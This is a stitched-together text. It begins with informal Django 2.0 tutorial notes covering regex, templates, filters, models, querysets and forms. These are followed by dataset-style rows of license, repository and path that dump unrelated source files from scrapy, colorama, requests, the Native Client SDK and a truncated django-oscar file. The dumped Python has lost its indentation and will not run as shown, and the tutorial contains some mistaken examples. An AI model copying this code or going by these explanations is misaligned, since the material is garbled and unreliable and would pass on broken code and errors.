To check whether a string must be present at the beginning or the end of the line,
you must use the ^ and $ characters. If ^ is present at the beginning of the string,
the validation will be done at the beginning of the chain. It works in the same way
for $ at the end.
* The ^test regular expression will validate test and test01l but not dktest
or ttest01
* The regular expression test$ will validate test and 01test, but not
test01
* The regular expression ^test$ will only validate test
# The any character regular expression
In a regular expression, the dot ( . ) means "any character". So, when you need to accept
characters that cannot be known in advance, the dot is used. If you want to match a literal dot
in your expression, use the escape character, \ .
* ^te.t validates test or tept
* ^test\.me$ only validates test.me
# Character classes
To validate the characters, you can use character classes. A character class is enclosed
in square brackets and contains all the allowed characters. To validate all the numbers
and letters in a location, you must use [0123456789a] . For example, ^tes[t0e]$ will
only validate the three chains: test , tes0 , and tese .
You can also use the following predefined classes:
• [0-9] is equivalent to [0123456789]
• [a-z] matches all lowercase letters, [abcdefghijklmnopqrstuvwxyz]
• [A-Z] matches all uppercase letters
• [a-zA-Z] matches all the letters
The following are the shortcuts:
• \d is equivalent to [0-9]
• \w is equivalent to [a-zA-Z0-9_]
# Validating the number of characters
To validate a character a specific number of times, you must use braces
{x, y} , where x defines the minimum number of occurrences and y is the maximum
number of occurrences. If one of them is not specified, you will have an undefined
value. For example, if you forget to include an element in {2,} , it means that the
character must be present at least twice.
^test{2,3}$ only validates testt and testtt
^tests{0,1}$ only validates test and tests
^.{1,}$ validates all the strings except one: the empty string
The following are the shortcuts:
• * is equivalent to {0,}
• ? is equivalent to {0,1}
• + is equivalent to {1,}
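These regular expressions are what Django uses to match URLs in a URLconf. As a hedged illustration (the route and view name are invented, not the book's), a regex-based route in Django 2.x could look like this:
# urls.py -- hypothetical example using re_path (Django 2.x)
from django.urls import re_path
from . import views
urlpatterns = [
    # ^ and $ anchor the whole path; (?P<task_id>\d+) captures one or more digits
    re_path(r'^task/(?P<task_id>\d+)/$', views.task_detail),
]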
To Run the development server:
$ python manage.py runserver 127.0.0.1:8000
Create a 'Hey There!' app in django 2.0.2:
1- in the project settings file, add the newly created app 'TaskManager' to the 'INSTALLED_APPS' variable
2- in the project urls file, add the following url path('task_manager/', include('TaskManager.urls')), to the URLPatterns list,
do not forget to import 'include' from django.urls
3- create urls.py file in the newly created application
from django.urls import path
from . import views
urlpatterns = [
path('index/', views.index),
]
4- and then add the following to the views.py in the newly created application.
from django.http import HttpResponse
def index(request):
    return HttpResponse('Hey there')
Chapter Four:
Working with Templates
# TODO : write how to make a hello world program for django views
There are several functions to send variables to the template. The two main functions
are render() and render_to_response() . The render() function is very similar to
render_to_response () . The main difference is that if we use render , we do not
need to specify context_instance = RequestContext(request) in order to send
the current context. This is the context that will allow us to use the CSRF middleware
later in the book.
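For example (the template path and the variables here are only illustrative), a view passing variables to a template with render() could look like:
from django.shortcuts import render
def index(request):
    # the dictionary is the context made available to the template
    return render(request, 'en/public/index.html', {'my_var': 'Hello world!', 'years': 15})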
Templating language:
Integrating variables in templates
<span> {{ my_var }} </span>
Conditional statements:
<span>
{% if years < 10 %}
You are a child
{% elif years < 18 %}
You are a teenager
{% else %}
You are an adult!
{% endif %}
</span>
Looping in a template
<ul>
{% for city in array_city %}
<li>
{{ city }}
</li>
{% endfor %}
</ul>
Using filters: Filters are an effective way to modify the data before sending it to the template.
The upper and lower filters
The lower filter converts into lowercase letters, and the upper filter converts
into uppercase letters
The lower filter
The code for the lower filter is as follows:
<span> {{ my_hello | lower }} </span>
This code generates the following HTML code:
<span> hello world! </span>
The upper filter
The code for the upper filter is as follows:
<span> {{ my_hello | upper }} </span>
This code generates the following HTML code:
<span> HELLO WORLD! </span>
The capfirst filter
The capfirst filter transforms the first letter to uppercase. The example with the
myvar = "hello" variable is as follows:
<span>{{ my_hello | capfirst }}</span>
The pluralize filter
The pluralize filter can easily handle plurals. Often, developers choose a simple
solution for lack of time: displaying a string such as You have 2 product(s)
in your cart.
You have {{ nb_products }} product{{ nb_products|pluralize }} in
our cart.
This template will show the following two strings if nb_products is 1 and 2 :
You have 1 product in our cart.
You have 2 products in our cart.
I received {{ nb_diaries }} diar{{ nb_diaries|pluralize:"y,ies" }}.
The previous code will show the following two strings if nb_diaries is 1 and 2 :
I received 1 diary.
I received 2 diaries.
In the previous example, we used a filter that takes arguments for the first time.
To set parameters to a filter, you must use the following syntax:
{{ variable | filter:"parameters" }}
This filter helps to increase the quality of your site. A website looks much more
professional when it displays correct sentences.
The linebreaks filter:
The linebreaks filter allows you to convert line breaks into an HTML tag. A single
new line is transformed into the <br /> tag. A new line followed by a blank will
become a paragraph break , </p> :
<span>{{ text|linebreaks }}</span>
The truncatechars filter
The truncatechars filter allows you to truncate a string from a certain length. If this
number is exceeded, the string is truncated and Django adds the string " ... ".
The example of the variable that contains "Welcome in Django " is as follows:
{{ text|truncatechars:14 }}
Creating DRY URLs
<a href="{% url 'public_connection' %}">Connection</a>
{% url "url_name" param %}
{% url "url_name" param1, param2 %}
Extending the templates
The legacy of templates allows you to define a super template and a subtemplate that
inherits from the super template. In the super template, it is possible to define blocks
that subtemplates can fill. This method allows us to respect the DRY philosophy by
applying the common code to several templates in a super template.
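A minimal sketch of this mechanism (the file names base.html and index.html are placeholders, not the book's): the super template declares a block and the subtemplate fills it.
<!-- base.html (super template) -->
<html>
  <body>
    {% block content %}{% endblock %}
  </body>
</html>
<!-- index.html (subtemplate) -->
{% extends "base.html" %}
{% block content %}
  <p>Hello world!</p>
{% endblock %}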
Using static files in templates
To set the path where Django will look for static files, we have to change our
settings.py file by adding or changing the following line:
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, '../TasksManager/static/'),
)
<link href="{% static "css/style.css" %}" rel="stylesheet" type="text/css" />
To use the tag in our static template, we must also load the system by putting the
following line before using the static tag:
{% load staticfiles %}
Chapter Five:
Working with Models
A model is an object that inherits from the Model class. The Model class is a Django
class that is specifically designed for data persistence.
We define fields in models. These properties allow us to organize data within a
model. To make a connection between databases and SQL, we can say that a model is
represented by a table in the database, and a model property is represented by a field
in the table.
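For example (the exact fields are illustrative, not the book's model), a Project model could be written as follows:
# models.py -- hedged sketch of a model definition
from django.db import models
class Project(models.Model):
    title = models.CharField(max_length=50)         # becomes a VARCHAR column in the table
    description = models.CharField(max_length=1000)
    client_name = models.CharField(max_length=50)
    def __str__(self):
        return self.title
After changing models, the database schema is created or updated through manage.py (makemigrations and migrate in recent Django versions).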
Chapter Six:
Getting a Model's Data with Querysets
Querysets are used for data retrieval rather than for constructing SQL queries
directly. They are part of the ORM used by Django. An ORM is used to link the view
and controller by a layer of abstraction. In this way, the developer uses object model
types without the need to write a SQL query. We will use querysets to retrieve the
data we have stored in the database through models. These four operations are often
summarized by CRUD (Create, Read, Update, and Delete).
Getting data from the database
Getting multiple records
all_projects = Project.objects.all()
The all() method can be linked to a SQL SELECT * FROM query. Now, we will use
the filter() method to filter our results and make the equivalent of a SELECT *
FROM Project WHERE field = value query.
Filter example:
Project.objects.filter(client_name="Me")
Getting only one record
To retrieve a single record with a queryset, we should use the get() method as in
the following line:
first_project = Project.objects.get(id="1")
The get() method, like the filter() method, accepts filter arguments.
However, you should be careful with setting the filters that retrieve a single record.
If the argument to get() is client_name = "Me" , it would raise an error if no record,
or more than one record, matched client_name .
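A hedged sketch of how these errors can be caught (the exception classes are the standard ones Django attaches to every model):
from TasksManager.models import Project
try:
    project = Project.objects.get(client_name="Me")
except Project.DoesNotExist:
    project = None                          # no matching record
except Project.MultipleObjectsReturned:
    # several matching records: fall back to the first one, for example
    project = Project.objects.filter(client_name="Me").first()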
Updating multiple records
To edit multiple records in one shot, you must use the update() method with a
queryset object type. For example, our People customer is bought by a company
named Nobody , so we need to change all the projects where the client_name
property is equal to People :
from TasksManager.models import Project
from django.shortcuts import render
def page(request):
    task = Project.objects.filter(client_name="people").update(client_name="Nobody")
    return render(request, 'en/public/index.html', {'action': 'Update for many model'})
The update() method of a queryset can change all the records related to this
queryset. This method cannot be used on an instance of a model.
Deleting a record
To delete a record in the database, we must use the delete() method
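A short hedged example of both forms (the values are illustrative):
from TasksManager.models import Project
# delete a single record through a model instance
old_project = Project.objects.get(id="1")
old_project.delete()
# delete every record matched by a queryset
Project.objects.filter(client_name="Nobody").delete()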
Chapter Seven:
Working with Django Forms
Do not forget to add the CSRF token in all the forms of the site where protection is
enabled. HTML forms are also involved, and the one we have just made does not
include the token. For the previous form to work with CSRF protection, we need
to add the following line between the <form> and </form> tags:
{% csrf_token %}
Read about forms in the Django documentation: advanced usage of Django forms, validations and extending validations, customizing the display of error messages
using widgets, and setting initial data in a form.
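As a small hedged sketch (the field names are invented for illustration), a form with built-in validation can be declared and then checked in a view:
# forms.py -- hypothetical form
from django import forms
class ProjectForm(forms.Form):
    title = forms.CharField(max_length=50)
    description = forms.CharField(widget=forms.Textarea, required=False)
# in a view, bind the submitted data and validate it:
# form = ProjectForm(request.POST)
# if form.is_valid():
#     title = form.cleaned_data['title']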
Chapter Eight:
Raising Your Productivity with CBV
|
mit
|
barraponto/scrapy
|
tests/test_logformatter.py
|
80
|
2131
|
import unittest
import six
from scrapy.spiders import Spider
from scrapy.http import Request, Response
from scrapy.item import Item, Field
from scrapy.logformatter import LogFormatter
class CustomItem(Item):
name = Field()
def __str__(self):
return "name: %s" % self['name']
class LoggingContribTest(unittest.TestCase):
def setUp(self):
self.formatter = LogFormatter()
self.spider = Spider('default')
def test_crawled(self):
req = Request("http://www.example.com")
res = Response("http://www.example.com")
logkws = self.formatter.crawled(req, res, self.spider)
logline = logkws['msg'] % logkws['args']
self.assertEqual(logline,
"Crawled (200) <GET http://www.example.com> (referer: None)")
req = Request("http://www.example.com", headers={'referer': 'http://example.com'})
res = Response("http://www.example.com", flags=['cached'])
logkws = self.formatter.crawled(req, res, self.spider)
logline = logkws['msg'] % logkws['args']
self.assertEqual(logline,
"Crawled (200) <GET http://www.example.com> (referer: http://example.com) ['cached']")
def test_dropped(self):
item = {}
exception = Exception(u"\u2018")
response = Response("http://www.example.com")
logkws = self.formatter.dropped(item, exception, response, self.spider)
logline = logkws['msg'] % logkws['args']
lines = logline.splitlines()
assert all(isinstance(x, six.text_type) for x in lines)
self.assertEqual(lines, [u"Dropped: \u2018", '{}'])
def test_scraped(self):
item = CustomItem()
item['name'] = u'\xa3'
response = Response("http://www.example.com")
logkws = self.formatter.scraped(item, response, self.spider)
logline = logkws['msg'] % logkws['args']
lines = logline.splitlines()
assert all(isinstance(x, six.text_type) for x in lines)
self.assertEqual(lines, [u"Scraped from <200 http://www.example.com>", u'name: \xa3'])
if __name__ == "__main__":
unittest.main()
|
bsd-3-clause
|
patrickglass/creo
|
creo/packages/colorama/ansitowin32.py
|
442
|
9262
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
import os
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll
winterm = None
if windll is not None:
winterm = WinTerm()
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_CSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])') # Control Sequence Introducer
ANSI_OSC_RE = re.compile('\033\]((?:.|;)*?)(\x07)') # Operating System Command
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = os.name == 'nt'
on_emulated_windows = on_windows and 'TERM' in os.environ
# should we strip ANSI sequences from our output?
if strip is None:
strip = on_windows and not on_emulated_windows
self.strip = strip
# should we should convert ANSI sequences into win32 calls?
if convert is None:
convert = on_windows and not wrapped.closed and not on_emulated_windows and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
AnsiFore.RESET: (winterm.fore, ),
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
}
return dict()
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif not self.wrapped.closed and is_a_tty(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
text = self.convert_osc(text)
for match in self.ANSI_CSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(command, paramstring)
self.call_win32(command, params)
def extract_params(self, command, paramstring):
if command in 'Hf':
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
while len(params) < 2:
# defaults:
params = params + (1,)
else:
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
if len(params) == 0:
# defaults:
if command in 'JKm':
params = (0,)
elif command in 'ABCD':
params = (1,)
return params
def call_win32(self, command, params):
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in 'J':
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
elif command in 'K':
winterm.erase_line(params[0], on_stderr=self.on_stderr)
elif command in 'Hf': # cursor position - absolute
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
elif command in 'ABCD': # cursor position - relative
n = params[0]
# A - up, B - down, C - forward, D - back
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
def convert_osc(self, text):
for match in self.ANSI_OSC_RE.finditer(text):
start, end = match.span()
text = text[:start] + text[end:]
paramstring, command = match.groups()
if command in '\x07': # \x07 = BEL
params = paramstring.split(";")
# 0 - change title and icon (we will only change title)
# 1 - change icon (we don't support this)
# 2 - change title
if params[0] in '02':
winterm.set_title(params[1])
return text
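# --- Illustrative sketch, not part of the original file ---
# The wrapper above (colorama's AnsiToWin32) strips or converts ANSI escape
# sequences as text is written to the wrapped stream. Assuming the standard
# colorama top-level API, typical usage looks roughly like this:
#
#     import sys
#     from colorama import AnsiToWin32, Fore
#
#     stream = AnsiToWin32(sys.stdout).stream   # converted/stripped as needed
#     stream.write(Fore.RED + 'error' + Fore.RESET + '\n')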
|
apache-2.0
|
Andr3as/CodiadDirect
|
SublimeText2/requests/adapters.py
|
6
|
15239
|
# -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3 import Retry
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError, ProxyError
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param int max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed connections and
timeouts, never to requests where the server returns a response.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
self.max_retries = max_retries
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
"""Initializes a urllib3 PoolManager.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
:param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block, **pool_kwargs)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
"""
if proxy not in self.proxy_manager:
proxy_headers = self.proxy_headers(proxy)
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs)
return self.proxy_manager[proxy]
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(url.lower()).scheme)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_manager = self.proxy_manager_for(proxy)
conn = proxy_manager.connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes to proxy URLs.
"""
proxies = proxies or {}
scheme = urlparse(request.url).scheme
proxy = proxies.get(scheme)
if proxy and scheme != 'https':
url, _ = urldefrag(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
:param kwargs: Optional additional keyword arguments.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) The timeout on the request.
:param verify: (optional) Whether to verify SSL certificates.
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=Retry(self.max_retries, read=False),
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
else:
# All is well, return the connection to the pool.
conn._put_conn(low_conn)
except socket.error as sockerr:
raise ConnectionError(sockerr, request=request)
except MaxRetryError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e, request=request)
elif isinstance(e, TimeoutError):
raise Timeout(e, request=request)
else:
raise
return self.build_response(request, resp)
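# --- Illustrative sketch, not part of the original module ---
# Several methods above (init_poolmanager, proxy_manager_for, cert_verify, ...)
# note that they are "only exposed for use when subclassing" HTTPAdapter. A
# minimal subclass, using only the signatures defined in this module, might
# look like this (the class name and pool size are illustrative):
#
#     class SmallPoolAdapter(HTTPAdapter):
#         def init_poolmanager(self, connections, maxsize,
#                              block=DEFAULT_POOLBLOCK, **pool_kwargs):
#             # cap each pool at a single connection, keep the other defaults
#             super(SmallPoolAdapter, self).init_poolmanager(
#                 connections, 1, block=block, **pool_kwargs)
#
#     # s = requests.Session(); s.mount('https://', SmallPoolAdapter())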
|
mit
|
cvsuser-chromium/chromium
|
native_client_sdk/src/build_tools/sdk_tools/command/info.py
|
160
|
1162
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import command_common
import logging
import manifest_util
def Info(manifest, bundle_names):
valid_bundles, invalid_bundles = command_common.GetValidBundles(manifest,
bundle_names)
if invalid_bundles:
logging.warn('Unknown bundle(s): %s\n' % (', '.join(invalid_bundles)))
if not valid_bundles:
logging.warn('No valid bundles given.')
return
for bundle_name in valid_bundles:
bundle = manifest.GetBundle(bundle_name)
print bundle.name
for key in sorted(bundle.iterkeys()):
value = bundle[key]
if key == manifest_util.ARCHIVES_KEY:
for archive in bundle.GetArchives():
print ' Archive:'
if archive:
for archive_key in sorted(archive.iterkeys()):
print ' %s: %s' % (archive_key, archive[archive_key])
elif key not in (manifest_util.ARCHIVES_KEY, manifest_util.NAME_KEY):
print ' %s: %s' % (key, value)
print
|
bsd-3-clause
|
ZazieTheBeast/oscar
|
src/oscar/apps/dashboard/orders/views.py
|
15
|
33150
|
import datetime
from collections import OrderedDict
